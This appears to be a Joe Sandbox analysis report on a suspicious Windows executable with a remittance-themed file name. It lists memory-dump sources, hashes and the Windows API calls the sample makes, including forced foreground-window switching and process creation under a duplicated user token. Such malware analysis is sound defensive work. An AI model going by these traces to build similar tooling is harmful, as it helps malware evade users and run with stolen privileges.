                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                      • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                      • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                      • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                      • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                      • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                      • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                      • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                      • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                      • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __lock_file
                                                                      • String ID:
                                                                      • API String ID: 3031932315-0
                                                                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                      • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                      • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                      • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                      • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 03EC2D5B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                      • Instruction ID: 25616a6440ee407552b85bd05ae43e4c788f96683aa97142aa6feab1fc66e11d
                                                                      • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                      • Instruction Fuzzy Hash: 59E08C30A25748EBCF20CBA8DA24AED7BB8D719720F004F98EA16C3290D6348A429714
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 03EC2D2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                      • Instruction ID: 3c80165e367caede41085d3b1261c65b41eb757656504d0a3fe156dfc0ce8a21
                                                                      • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                      • Instruction Fuzzy Hash: F6D05E7091520CEBCB10CFA499049DE77A8D704321F008B58EE1587280D53199419750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                      • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                      • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                      • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 03EC4721
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: c074e4ff606045c3fecc9a2b15844ec5e19ecb1e6939328782dd856f45b6da12
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 47E0BF7598010DEFDB00EFE8D6496DE7BB4EF04301F1006A5FD05D7681DB309E648A62
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 03EC4721
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 0e6a1a9cb6e5b4be39bbeff77b5a4e1db6434a93958868cd5e0d188b49445a0d
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: 04E0E67598010DDFDB00EFF8D64969E7FB4EF04301F1002A5FD01D2281D6309D608A62
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                      • SendMessageW.USER32 ref: 0047CA7F
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00AB18C0,00000000,00000000,00000000), ref: 0047CB9B
                                                                      • ImageList_BeginDrag.COMCTL32(00AB18C0,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                      • SetCapture.USER32(?), ref: 0047CBB6
                                                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                      • SendMessageW.USER32 ref: 0047CD12
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                      • SendMessageW.USER32 ref: 0047CD80
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                      • SendMessageW.USER32 ref: 0047CE93
                                                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,009B1B98,00000000,?,?,?,?), ref: 0047CF1C
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                      • SendMessageW.USER32 ref: 0047CF6B
                                                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,009B1B98,00000000,?,?,?,?), ref: 0047CFE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3100379633-4164748364
                                                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00434420
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                      • IsIconic.USER32(?), ref: 0043444F
                                                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 2889586943-2988720461
                                                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                      APIs
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                      • _wcslen.LIBCMT ref: 00446498
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • _wcsncpy.LIBCMT ref: 004464C0
                                                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                      • CloseDesktop.USER32(?), ref: 0044657A
                                                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                      • String ID: $@OH$default$winsta0
                                                                      • API String ID: 3324942560-3791954436
                                                                      • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                      • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                      APIs
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
